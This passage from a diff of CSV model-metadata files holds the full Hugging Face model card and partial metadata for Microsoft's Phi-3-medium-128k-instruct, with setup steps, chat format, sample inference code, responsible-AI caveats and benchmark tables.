| 284 |
+
|
| 285 |
+
We also support additional generation methods and speculative generation, please find reference at [OpenELM#usage](https://huggingface.co/apple/OpenELM#usage).","{""id"": ""liswei/Taiwan-ELM"", ""author"": ""liswei"", ""sha"": ""5c08aa79a15ceb6d0558cd2a0c2890f158470686"", ""last_modified"": ""2024-06-02 07:45:01+00:00"", ""created_at"": ""2024-06-02 06:47:44+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""zh"", ""dataset:liswei/Taiwan-Text-Excellence-2B"", ""dataset:liswei/PromptPair-TW"", ""dataset:yentinglin/TaiwanChat"", ""base_model:apple/OpenELM"", ""base_model:finetune:apple/OpenELM"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: apple/OpenELM\ndatasets:\n- liswei/Taiwan-Text-Excellence-2B\n- liswei/PromptPair-TW\n- yentinglin/TaiwanChat\nlanguage:\n- zh\nlicense: apache-2.0"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='TTE Logo.jpeg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Taiwan ELM Logo.jpeg', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-06-02 07:45:01+00:00"", ""cardData"": ""base_model: apple/OpenELM\ndatasets:\n- liswei/Taiwan-Text-Excellence-2B\n- liswei/PromptPair-TW\n- yentinglin/TaiwanChat\nlanguage:\n- zh\nlicense: apache-2.0"", ""transformersInfo"": null, ""_id"": ""665c1590d892e3815d9d1e3f"", ""modelId"": ""liswei/Taiwan-ELM"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=liswei/Taiwan-ELM&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bliswei%2FTaiwan-ELM%5D(%2Fliswei%2FTaiwan-ELM)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 286 |
+
https://huggingface.co/cpu4dream/llava-small-OpenELM-AIMv2-0.6B,N/A,N/A,1,,0,,0,,0,,0,,0
|
Phi-3-medium-128k-instruct_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
|
@@ -0,0 +1,523 @@
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
microsoft/Phi-3-medium-128k-instruct,"---
|
| 3 |
+
license: mit
|
| 4 |
+
license_link: https://huggingface.co/microsoft/Phi-3-medium-128k-instruct/resolve/main/LICENSE
|
| 5 |
+
|
| 6 |
+
language:
|
| 7 |
+
- multilingual
|
| 8 |
+
pipeline_tag: text-generation
|
| 9 |
+
tags:
|
| 10 |
+
- nlp
|
| 11 |
+
- code
|
| 12 |
+
inference:
|
| 13 |
+
parameters:
|
| 14 |
+
temperature: 0.7
|
| 15 |
+
widget:
|
| 16 |
+
- messages:
|
| 17 |
+
- role: user
|
| 18 |
+
content: Can you provide ways to eat combinations of bananas and dragonfruits?
|
| 19 |
+
---
|
| 20 |
+
🎉 **Phi-3.5**: [[mini-instruct]](https://huggingface.co/microsoft/Phi-3.5-mini-instruct); [[MoE-instruct]](https://huggingface.co/microsoft/Phi-3.5-MoE-instruct) ; [[vision-instruct]](https://huggingface.co/microsoft/Phi-3.5-vision-instruct)
|
| 21 |
+
|
| 22 |
+
## Model Summary
|
| 23 |
+
|
| 24 |
+
Phi-3-Medium-128K-Instruct is a 14B-parameter, lightweight, state-of-the-art open model trained on the Phi-3 datasets, which include both synthetic data and filtered publicly available website data, with a focus on high-quality, reasoning-dense properties.
|
| 25 |
+
The model belongs to the Phi-3 family, Medium version, and comes in two variants, [4K](https://huggingface.co/microsoft/Phi-3-medium-4k-instruct) and [128K](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct), which denote the context length (in tokens) it can support.
|
| 26 |
+
|
| 27 |
+
The model underwent a post-training process that incorporates both supervised fine-tuning and direct preference optimization to improve instruction following and safety.
|
| 28 |
+
When assessed against benchmarks testing common sense, language understanding, math, code, long context, and logical reasoning, Phi-3-Medium-128K-Instruct showcased robust, state-of-the-art performance among models of the same size and the next size up.
|
| 29 |
+
|
| 30 |
+
Resources and Technical Documentation:
|
| 31 |
+
|
| 32 |
+
+ [Phi-3 Microsoft Blog](https://aka.ms/Phi-3Build2024)
|
| 33 |
+
+ [Phi-3 Technical Report](https://aka.ms/phi3-tech-report)
|
| 34 |
+
+ [Phi-3 on Azure AI Studio](https://aka.ms/phi3-azure-ai)
|
| 35 |
+
+ [Phi-3 Cookbook](https://github.com/microsoft/Phi-3CookBook)
|
| 36 |
+
|
| 37 |
+
| | Short Context | Long Context |
|
| 38 |
+
| ------- | ------------- | ------------ |
|
| 39 |
+
| Mini | 4K [[HF]](https://huggingface.co/microsoft/Phi-3-mini-4k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-mini-4k-instruct-onnx) ; [[GGUF]](https://huggingface.co/microsoft/Phi-3-mini-4k-instruct-gguf) | 128K [[HF]](https://huggingface.co/microsoft/Phi-3-mini-128k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-mini-128k-instruct-onnx)|
|
| 40 |
+
| Small | 8K [[HF]](https://huggingface.co/microsoft/Phi-3-small-8k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-small-8k-instruct-onnx-cuda) | 128K [[HF]](https://huggingface.co/microsoft/Phi-3-small-128k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-small-128k-instruct-onnx-cuda)|
|
| 41 |
+
| Medium | 4K [[HF]](https://huggingface.co/microsoft/Phi-3-medium-4k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-medium-4k-instruct-onnx-cuda) | 128K [[HF]](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct-onnx-cuda)|
|
| 42 |
+
| Vision | | 128K [[HF]](https://huggingface.co/microsoft/Phi-3-vision-128k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-vision-128k-instruct-onnx-cuda)|
|
| 43 |
+
|
| 44 |
+
## Intended Uses
|
| 45 |
+
|
| 46 |
+
**Primary use cases**
|
| 47 |
+
|
| 48 |
+
The model is intended for broad commercial and research use in English. It is suited to general-purpose AI systems and applications that require:
|
| 49 |
+
|
| 50 |
+
1) Memory/compute constrained environments
|
| 51 |
+
2) Latency bound scenarios
|
| 52 |
+
3) Strong reasoning (especially code, math and logic)
|
| 53 |
+
|
| 54 |
+
Our model is designed to accelerate research on language and multimodal models, for use as a building block for generative AI powered features.
|
| 55 |
+
|
| 56 |
+
**Use case considerations**
|
| 57 |
+
|
| 58 |
+
Our models are not specifically designed or evaluated for all downstream purposes. Developers should consider common limitations of language models as they select use cases, and evaluate and mitigate for accuracy, safety, and fairness before using within a specific downstream use case, particularly for high-risk scenarios. Developers should be aware of and adhere to applicable laws or regulations (including privacy, trade compliance laws, etc.) that are relevant to their use case.
|
| 59 |
+
|
| 60 |
+
Nothing contained in this Model Card should be interpreted as or deemed a restriction or modification to the license the model is released under.
|
| 61 |
+
|
| 62 |
+
## How to Use
|
| 63 |
+
|
| 64 |
+
Phi-3-Medium-128k-Instruct has been integrated into the development version (4.40.2) of `transformers`. Until the official version is released through `pip`, do one of the following:
|
| 65 |
+
* When loading the model, ensure that `trust_remote_code=True` is passed as an argument to the `from_pretrained()` function.
|
| 66 |
+
|
| 67 |
+
* Update your local `transformers` to the development version: `pip uninstall -y transformers && pip install git+https://github.com/huggingface/transformers`. The previous command is an alternative to cloning and installing from source.
|
| 68 |
+
|
| 69 |
+
The current `transformers` version can be verified with: `pip list | grep transformers`.
|
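For instance, you can check the version programmatically as well (a minimal sketch; assumes `transformers` is importable):
```python
import transformers

# The development build needed for Phi-3 support should report 4.40.2 or later.
print(transformers.__version__)
```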
| 70 |
+
|
| 71 |
+
Phi-3-Medium-128k-Instruct is also available in [Azure AI Studio](https://aka.ms/phi3-azure-ai).
|
| 72 |
+
|
| 73 |
+
### Tokenizer
|
| 74 |
+
|
| 75 |
+
Phi-3-Medium-128k-Instruct supports a vocabulary size of up to `32064` tokens. The [tokenizer files](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct/blob/main/added_tokens.json) already provide placeholder tokens that can be used for downstream fine-tuning, but they can also be extended up to the model's vocabulary size.
|
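As a minimal sketch of extending the tokenizer before fine-tuning (the `<|my_tool|>` token below is a hypothetical example, not part of the released vocabulary):
```python
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained(""microsoft/Phi-3-medium-128k-instruct"")
print(len(tokenizer))  # base vocabulary plus the reserved placeholder tokens

# Register a new special token; if this grows the vocabulary, remember to call
# model.resize_token_embeddings(len(tokenizer)) before fine-tuning.
tokenizer.add_special_tokens({""additional_special_tokens"": [""<|my_tool|>""]})
```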
| 76 |
+
|
| 77 |
+
### Chat Format
|
| 78 |
+
|
| 79 |
+
Given the nature of the training data, the Phi-3-Medium-128k-Instruct model is best suited for prompts using the chat format below.
|
| 80 |
+
You can provide the prompt as a question using the following generic template:
|
| 81 |
+
```markdown
|
| 82 |
+
<|user|>\nQuestion <|end|>\n<|assistant|>
|
| 83 |
+
```
|
| 84 |
+
For example:
|
| 85 |
+
```markdown
|
| 86 |
+
<|user|>
|
| 87 |
+
How to explain Internet for a medieval knight?<|end|>
|
| 88 |
+
<|assistant|>
|
| 89 |
+
```
|
| 90 |
+
|
| 91 |
+
where the model generates the text after `<|assistant|>`. For few-shot prompts, the prompt can be formatted as follows:
|
| 92 |
+
|
| 93 |
+
```markdown
|
| 94 |
+
<|user|>
|
| 95 |
+
I am going to Paris, what should I see?<|end|>
|
| 96 |
+
<|assistant|>
|
| 97 |
+
Paris, the capital of France, is known for its stunning architecture, art museums, historical landmarks, and romantic atmosphere. Here are some of the top attractions to see in Paris:\n\n1. The Eiffel Tower: The iconic Eiffel Tower is one of the most recognizable landmarks in the world and offers breathtaking views of the city.\n2. The Louvre Museum: The Louvre is one of the world's largest and most famous museums, housing an impressive collection of art and artifacts, including the Mona Lisa.\n3. Notre-Dame Cathedral: This beautiful cathedral is one of the most famous landmarks in Paris and is known for its Gothic architecture and stunning stained glass windows.\n\nThese are just a few of the many attractions that Paris has to offer. With so much to see and do, it's no wonder that Paris is one of the most popular tourist destinations in the world.<|end|>
|
| 98 |
+
<|user|>
|
| 99 |
+
What is so great about #1?<|end|>
|
| 100 |
+
<|assistant|>
|
| 101 |
+
```
|
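Rather than assembling these tags by hand, you can also rely on the tokenizer's built-in chat template, which emits this same format (a minimal sketch):
```python
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained(""microsoft/Phi-3-medium-128k-instruct"")
messages = [{""role"": ""user"", ""content"": ""I am going to Paris, what should I see?""}]

# Returns the formatted prompt string, ending with <|assistant|> so the model
# knows to generate the reply next.
prompt = tokenizer.apply_chat_template(messages, tokenize=False)
print(prompt)
```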
| 102 |
+
|
| 103 |
+
### Sample inference code
|
| 104 |
+
|
| 105 |
+
This code snippet shows how to quickly get started with running the model on a GPU:
|
| 106 |
+
|
| 107 |
+
```python
|
| 108 |
+
import torch
|
| 109 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline
|
| 110 |
+
|
| 111 |
+
torch.random.manual_seed(0)
|
| 112 |
+
model_id = ""microsoft/Phi-3-medium-128k-instruct""
|
| 113 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 114 |
+
model_id,
|
| 115 |
+
device_map=""cuda"",
|
| 116 |
+
torch_dtype=""auto"",
|
| 117 |
+
trust_remote_code=True,
|
| 118 |
+
)
|
| 119 |
+
tokenizer = AutoTokenizer.from_pretrained(model_id)
|
| 120 |
+
|
| 121 |
+
messages = [
|
| 122 |
+
{""role"": ""user"", ""content"": ""Can you provide ways to eat combinations of bananas and dragonfruits?""},
|
| 123 |
+
{""role"": ""assistant"", ""content"": ""Sure! Here are some ways to eat bananas and dragonfruits together: 1. Banana and dragonfruit smoothie: Blend bananas and dragonfruits together with some milk and honey. 2. Banana and dragonfruit salad: Mix sliced bananas and dragonfruits together with some lemon juice and honey.""},
|
| 124 |
+
{""role"": ""user"", ""content"": ""What about solving an 2x + 3 = 7 equation?""},
|
| 125 |
+
]
|
| 126 |
+
|
| 127 |
+
pipe = pipeline(
|
| 128 |
+
""text-generation"",
|
| 129 |
+
model=model,
|
| 130 |
+
tokenizer=tokenizer,
|
| 131 |
+
)
|
| 132 |
+
|
| 133 |
+
generation_args = {
|
| 134 |
+
""max_new_tokens"": 500,
|
| 135 |
+
""return_full_text"": False,
|
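# note: with do_sample=False below, sampling parameters such as temperature are ignored and decoding is greedy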
| 136 |
+
""temperature"": 0.0,
|
| 137 |
+
""do_sample"": False,
|
| 138 |
+
}
|
| 139 |
+
|
| 140 |
+
output = pipe(messages, **generation_args)
|
| 141 |
+
print(output[0]['generated_text'])
|
| 142 |
+
```
|
| 143 |
+
|
| 144 |
+
*Some applications/frameworks might not include a BOS token (`<s>`) at the start of the conversation. Please ensure that it is included since it provides more reliable results.*
|
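A quick way to check (a minimal sketch):
```python
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained(""microsoft/Phi-3-medium-128k-instruct"")
ids = tokenizer(""Hello"")[""input_ids""]

# The first id should be the BOS token; prepend tokenizer.bos_token_id manually
# if your framework omits it.
print(ids[0] == tokenizer.bos_token_id)
```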
| 145 |
+
|
| 146 |
+
## Responsible AI Considerations
|
| 147 |
+
|
| 148 |
+
Like other language models, the Phi series models can potentially behave in ways that are unfair, unreliable, or offensive. Some of the limiting behaviors to be aware of include:
|
| 149 |
+
|
| 150 |
+
+ Quality of Service: the Phi models are trained primarily on English text. Languages other than English will experience worse performance. English language varieties with less representation in the training data might experience worse performance than standard American English.
|
| 151 |
+
+ Representation of Harms & Perpetuation of Stereotypes: These models can over- or under-represent groups of people, erase representation of some groups, or reinforce demeaning or negative stereotypes. Despite safety post-training, these limitations may still be present due to differing levels of representation of different groups or prevalence of examples of negative stereotypes in training data that reflect real-world patterns and societal biases.
|
| 152 |
+
+ Inappropriate or Offensive Content: these models may produce other types of inappropriate or offensive content, which may make it inappropriate to deploy for sensitive contexts without additional mitigations that are specific to the use case.
|
| 153 |
+
+ Information Reliability: Language models can generate nonsensical content or fabricate content that might sound reasonable but is inaccurate or outdated.
|
| 154 |
+
+ Limited Scope for Code: The majority of Phi-3 training data is based on Python and uses common packages such as ""typing, math, random, collections, datetime, itertools"". If the model generates Python scripts that utilize other packages, or scripts in other languages, we strongly recommend users manually verify all API uses.
|
| 155 |
+
|
| 156 |
+
Developers should apply responsible AI best practices and are responsible for ensuring that a specific use case complies with relevant laws and regulations (e.g. privacy, trade, etc.). Important areas for consideration include:
|
| 157 |
+
|
| 158 |
+
+ Allocation: Models may not be suitable for scenarios that could have consequential impact on legal status or the allocation of resources or life opportunities (ex: housing, employment, credit, etc.) without further assessments and additional debiasing techniques.
|
| 159 |
+
+ High-Risk Scenarios: Developers should assess suitability of using models in high-risk scenarios where unfair, unreliable or offensive outputs might be extremely costly or lead to harm. This includes providing advice in sensitive or expert domains where accuracy and reliability are critical (ex: legal or health advice). Additional safeguards should be implemented at the application level according to the deployment context.
|
| 160 |
+
+ Misinformation: Models may produce inaccurate information. Developers should follow transparency best practices and inform end-users they are interacting with an AI system. At the application level, developers can build feedback mechanisms and pipelines to ground responses in use-case specific, contextual information, a technique known as Retrieval Augmented Generation (RAG).
|
| 161 |
+
+ Generation of Harmful Content: Developers should assess outputs for their context and use available safety classifiers or custom solutions appropriate for their use case.
|
| 162 |
+
+ Misuse: Other forms of misuse such as fraud, spam, or malware production may be possible, and developers should ensure that their applications do not violate applicable laws and regulations.
|
| 163 |
+
|
| 164 |
+
|
| 165 |
+
## Training
|
| 166 |
+
|
| 167 |
+
### Model
|
| 168 |
+
|
| 169 |
+
* Architecture: Phi-3-Medium-128k-Instruct has 14B parameters and is a dense decoder-only Transformer model. The model is fine-tuned with supervised fine-tuning (SFT) and Direct Preference Optimization (DPO) to ensure alignment with human preferences and safety guidelines.
|
| 170 |
+
* Inputs: Text. It is best suited for prompts using chat format.
|
| 171 |
+
* Context length: 128k tokens
|
| 172 |
+
* GPUs: 512 H100-80G
|
| 173 |
+
* Training time: 42 days
|
| 174 |
+
* Training data: 4.8T tokens
|
| 175 |
+
* Outputs: Generated text in response to the input
|
| 176 |
+
* Dates: Our models were trained between February and April 2024
|
| 177 |
+
* Status: This is a static model trained on an offline dataset with a cutoff date of October 2023. Future versions of the tuned models may be released as we improve them.
|
| 178 |
+
* Release date: The model weights were released on May 21, 2024.
|
| 179 |
+
|
| 180 |
+
### Datasets
|
| 181 |
+
|
| 182 |
+
Our training data includes a wide variety of sources, totaling 4.8 trillion tokens (including 10% multilingual), and is a combination of
|
| 183 |
+
1) Publicly available documents filtered rigorously for quality, selected high-quality educational data, and code;
|
| 184 |
+
2) Newly created synthetic, “textbook-like” data for the purpose of teaching math, coding, common sense reasoning, general knowledge of the world (science, daily activities, theory of mind, etc.);
|
| 185 |
+
3) High-quality chat-format supervised data covering various topics to reflect human preferences on different aspects such as instruction following, truthfulness, honesty, and helpfulness.
|
| 186 |
+
|
| 187 |
+
We focus on the quality of data that could potentially improve the model's reasoning ability, and we filter publicly available documents to contain the correct level of knowledge. For example, the result of a Premier League game on a particular day might be good training data for frontier models, but we remove such information to leave more model capacity for reasoning in smaller models. More details about data can be found in the [Phi-3 Technical Report](https://aka.ms/phi3-tech-report).
|
| 188 |
+
|
| 189 |
+
## Benchmarks
|
| 190 |
+
|
| 191 |
+
We report the results for Phi-3-Medium-128k-Instruct on standard open-source benchmarks measuring the model's reasoning ability (both common sense reasoning and logical reasoning). We compare to Mixtral-8x22b, Gemini-Pro, Command R+ 104B, Llama-3-70B-Instruct, GPT-3.5-Turbo-1106, and GPT-4-Turbo-1106 (Chat).
|
| 192 |
+
|
| 193 |
+
All the reported numbers are produced with the exact same pipeline to ensure that the numbers are comparable. These numbers might differ from other published numbers due to slightly different choices in the evaluation.
|
| 194 |
+
|
| 195 |
+
As is now standard, we use few-shot prompts to evaluate the models, at temperature 0.
|
| 196 |
+
The prompts and number of shots are part of a Microsoft internal tool for evaluating language models; in particular, we did not optimize the pipeline for Phi-3.
|
| 197 |
+
More specifically, we do not change prompts, pick different few-shot examples, change prompt format, or do any other form of optimization for the model.
|
| 198 |
+
|
| 199 |
+
The number of k-shot examples is listed per benchmark.
|
| 200 |
+
|
| 201 |
+
|Benchmark|Phi-3-Medium-128k-Instruct<br>14b|Command R+<br>104B|Mixtral<br>8x22B|Llama-3-70B-Instruct|GPT3.5-Turbo<br>version 1106|Gemini<br>Pro|GPT-4-Turbo<br>version 1106 (Chat)|
|
| 202 |
+
|---------|-----------------------|--------|-------------|-------------------|-------------------|----------|------------------------|
|
| 203 |
+
|AGI Eval<br>5-shot|49.7|50.1|54.0|56.9|48.4|49.0|59.6|
|
| 204 |
+
|MMLU<br>5-shot|76.6|73.8|76.2|80.2|71.4|66.7|84.0|
|
| 205 |
+
|BigBench Hard<br>3-shot|77.9|74.1|81.8|80.4|68.3|75.6|87.7|
|
| 206 |
+
|ANLI<br>7-shot|57.3|63.4|65.2|68.3|58.1|64.2|71.7|
|
| 207 |
+
|HellaSwag<br>5-shot|81.6|78.0|79.0|82.6|78.8|76.2|88.3|
|
| 208 |
+
|ARC Challenge<br>10-shot|91.0|86.9|91.3|93.0|87.4|88.3|95.6|
|
| 209 |
+
|ARC Easy<br>10-shot|97.6|95.7|96.9|98.2|96.3|96.1|98.8|
|
| 210 |
+
|BoolQ<br>2-shot|86.5|86.1|82.7|89.1|79.1|86.4|91.3|
|
| 211 |
+
|CommonsenseQA<br>10-shot|82.2|82.0|82.0|84.4|79.6|81.8|86.7|
|
| 212 |
+
|MedQA<br>2-shot|67.6|59.2|67.9|78.5|63.4|58.2|83.7|
|
| 213 |
+
|OpenBookQA<br>10-shot|87.2|86.8|88.6|91.8|86.0|86.4|93.4|
|
| 214 |
+
|PIQA<br>5-shot|87.8|86.4|85.0|85.3|86.6|86.2|90.1|
|
| 215 |
+
|Social IQA<br>5-shot|79.0|75.3|78.2|81.1|68.3|75.4|81.7|
|
| 216 |
+
|TruthfulQA (MC2)<br>10-shot|74.3|57.8|67.4|81.9|67.7|72.6|85.2|
|
| 217 |
+
|WinoGrande<br>5-shot|78.9|77.0|75.3|83.3|68.8|72.2|86.7|
|
| 218 |
+
|TriviaQA<br>5-shot|73.9|82.8|84.5|78.5|85.8|80.2|73.3|
|
| 219 |
+
|GSM8K Chain of Thought<br>8-shot|87.5|78.3|83.8|93.5|78.1|80.4|94.2|
|
| 220 |
+
|HumanEval<br>0-shot|58.5|61.6|39.6|78.7|62.2|64.4|79.9|
|
| 221 |
+
|MBPP<br>3-shot|73.8|68.9|70.7|81.3|77.8|73.2|86.7|
|
| 222 |
+
|Average|77.3|75.0|76.3|82.5|74.3|75.4|85.2|
|
| 223 |
+
|
| 224 |
+
We take a closer look at different categories across 80 public benchmark datasets in the table below:
|
| 225 |
+
|
| 226 |
+
|Benchmark|Phi-3-Medium-128k-Instruct<br>14b|Command R+<br>104B|Mixtral<br>8x22B|Llama-3-70B-Instruct|GPT3.5-Turbo<br>version 1106|Gemini<br>Pro|GPT-4-Turbo<br>version 1106 (Chat)|
|
| 227 |
+
|--------|------------------------|--------|-------------|-------------------|-------------------|----------|------------------------|
|
| 228 |
+
| Popular aggregated benchmark | 72.3 | 69.9 | 73.4 | 76.3 | 67.0 | 67.5 | 80.5 |
|
| 229 |
+
| Reasoning | 83.2 | 79.3 | 81.5 | 86.7 | 78.3 | 80.4 | 89.3 |
|
| 230 |
+
| Language understanding | 75.3 | 75.7 | 78.7 | 77.9 | 70.4 | 75.3 | 81.6 |
|
| 231 |
+
| Code generation | 64.2 | 68.6 | 60.0 | 69.3 | 70.4 | 66.7 | 76.1 |
|
| 232 |
+
| Math | 52.9 | 45.3 | 52.5 | 59.7 | 52.8 | 50.9 | 67.1 |
|
| 233 |
+
| Factual knowledge | 47.5 | 60.3 | 60.6 | 52.4 | 63.4 | 54.6 | 45.9 |
|
| 234 |
+
| Multilingual | 62.2 | 67.8 | 69.8 | 62.0 | 67.0 | 73.4 | 78.2 |
|
| 235 |
+
| Robustness | 70.2 | 57.9 | 65.5 | 78.7 | 69.3 | 69.7 | 84.6 |
|
| 236 |
+
|
| 237 |
+
|
| 238 |
+
## Software
|
| 239 |
+
|
| 240 |
+
* [PyTorch](https://github.com/pytorch/pytorch)
|
| 241 |
+
* [DeepSpeed](https://github.com/microsoft/DeepSpeed)
|
| 242 |
+
* [Transformers](https://github.com/huggingface/transformers)
|
| 243 |
+
* [Flash-Attention](https://github.com/HazyResearch/flash-attention)
|
| 244 |
+
|
| 245 |
+
## Hardware
|
| 246 |
+
Note that by default, the Phi-3-Medium model uses flash attention, which requires certain types of GPU hardware to run. We have tested on the following GPU types:
|
| 247 |
+
* NVIDIA A100
|
| 248 |
+
* NVIDIA A6000
|
| 249 |
+
* NVIDIA H100
|
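If your GPU is not on this list (for example, a V100 without flash-attention support), a common fallback is to request the eager attention implementation instead. A minimal sketch, assuming the model's custom code honors `attn_implementation` the way standard `transformers` models do:
```python
from transformers import AutoModelForCausalLM

model = AutoModelForCausalLM.from_pretrained(
    ""microsoft/Phi-3-medium-128k-instruct"",
    device_map=""cuda"",
    torch_dtype=""auto"",
    trust_remote_code=True,
    attn_implementation=""eager"",  # skip flash attention on unsupported hardware
)
```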
| 250 |
+
|
| 251 |
+
If you want to run the model on:
|
| 252 |
+
+ Optimized inference on GPU, CPU, and mobile: use the **ONNX** models [128k](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct-onnx-cuda)
|
| 253 |
+
|
| 254 |
+
## Cross Platform Support
|
| 255 |
+
|
| 256 |
+
The ONNX Runtime ecosystem now supports Phi-3 Medium models across platforms and hardware.
|
| 257 |
+
Optimized Phi-3 models are also published here in ONNX format, to run with ONNX Runtime on CPU and GPU across devices, including server platforms, Windows, Linux, and Mac desktops, and mobile CPUs, with the precision best suited to each of these targets. DirectML GPU acceleration is supported on Windows desktop GPUs (AMD, Intel, and NVIDIA).
|
| 258 |
+
Along with DirectML, ONNX Runtime provides cross-platform support for Phi-3 Medium across a range of devices: CPU, GPU, and mobile.
|
| 259 |
+
Here are some of the optimized configurations we have added:
|
| 260 |
+
|
| 261 |
+
|
| 262 |
+
1. ONNX models for int4 DML: Quantized to int4 via AWQ
|
| 263 |
+
2. ONNX model for fp16 CUDA
|
| 264 |
+
3. ONNX model for int4 CUDA: Quantized to int4 via RTN
|
| 265 |
+
4. ONNX model for int4 CPU and Mobile: Quantized to int4 via RTN
|
| 266 |
+
|
| 267 |
+
## License
|
| 268 |
+
|
| 269 |
+
The model is licensed under the [MIT license](https://huggingface.co/microsoft/Phi-3-medium-128k/resolve/main/LICENSE).
|
| 270 |
+
|
| 271 |
+
## Trademarks
|
| 272 |
+
|
| 273 |
+
This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow [Microsoft’s Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks). Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos is subject to those third parties’ policies.
|
| 274 |
+
","{""id"": ""microsoft/Phi-3-medium-128k-instruct"", ""author"": ""microsoft"", ""sha"": ""fa7d2aa4f5ea69b2e36b20d050cdae79c9bfbb3f"", ""last_modified"": ""2024-08-20 19:58:08+00:00"", ""created_at"": ""2024-05-07 15:27:32+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 24921, ""downloads_all_time"": null, ""likes"": 380, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": ""warm"", ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""phi3"", ""text-generation"", ""nlp"", ""code"", ""conversational"", ""custom_code"", ""multilingual"", ""license:mit"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- multilingual\nlicense: mit\nlicense_link: https://huggingface.co/microsoft/Phi-3-medium-128k-instruct/resolve/main/LICENSE\npipeline_tag: text-generation\ntags:\n- nlp\n- code\ninference:\n parameters:\n temperature: 0.7\nwidget:\n- messages:\n - role: user\n content: Can you provide ways to eat combinations of bananas and dragonfruits?"", ""widget_data"": [{""messages"": [{""role"": ""user"", ""content"": ""Can you provide ways to eat combinations of bananas and dragonfruits?""}]}], ""model_index"": null, ""config"": {""architectures"": [""Phi3ForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_phi3.Phi3Config"", ""AutoModelForCausalLM"": ""modeling_phi3.Phi3ForCausalLM""}, ""model_type"": ""phi3"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{% for message in messages %}{% if (message['role'] == 'user') %}{{'<|user|>' + '\n' + message['content'] + '<|end|>' + '\n' + '<|assistant|>' + '\n'}}{% elif (message['role'] == 'assistant') %}{{message['content'] + '<|end|>' + '\n'}}{% endif %}{% endfor %}"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""<|endoftext|>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CODE_OF_CONDUCT.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='NOTICE.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='SECURITY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", 
